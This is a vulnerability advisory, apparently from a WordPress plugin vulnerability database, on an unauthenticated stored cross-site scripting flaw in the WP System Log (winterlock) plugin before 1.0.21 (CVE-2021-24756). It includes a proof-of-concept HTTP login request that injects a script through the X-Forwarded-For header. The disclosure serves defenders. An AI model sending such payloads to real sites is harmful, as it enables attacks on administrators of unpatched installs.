WordPress Plugin Vulnerabilities

WP System Log < 1.0.21 - Unauthenticated Stored Cross-Site Scripting

Description

The plugin does not sanitise, validate and escape the IP address retrieved from login requests before outputting them in the admin dashboard, which could allow unauthenticated attacker to perform Cross-Site Scripting attacks against admins viewing the logs.

Proof of Concept

POST /wp-login.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
X-Forwarded-For: <script>alert(/XSS/)</script>
Connection: close
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1

log=a&pwd=b&wp-submit=Log+In


The XSS will be triggered in the Activity Log dashboard: /wp-admin/admin.php?page=winteractivitylog

Affects Plugins

Plugin icon
winterlock
Fixed in 1.0.21

References

CVE
CVE-2021-24756

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
9.8 (critical)

Miscellaneous

Original Researcher
wzy-ceb Attack defense
Submitter
wzy-ceb Attack defense
Verified
Yes
WPVDB ID
0cea0717-8f54-4f1c-b3ee-aff7dd91bf59

Timeline

Publicly Published
2021-11-15 (about 2 years ago)
Added
2021-11-15 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)

Other

Published
Title
Published
2015-02-11
Title
Ninja Forms <= 2.8.8 - Stored & Reflected XSS
Published
2014-09-22
Title
Wordfence 5.2.4 - IPTraf.php URI Request Stored XSS
Published
2016-08-14
Title
Photo Gallery by Supsystic < 1.8.6 - Stored Cross-Site Scripting via CSRF
Published
2022-11-02
Title
Salat Times < 3.2.2 - Admin+ Stored Cross-Site Scripting
Published
2024-03-29
Title
SEO Title Tag <= 3.5.9 - Reflected Cross-Site Scripting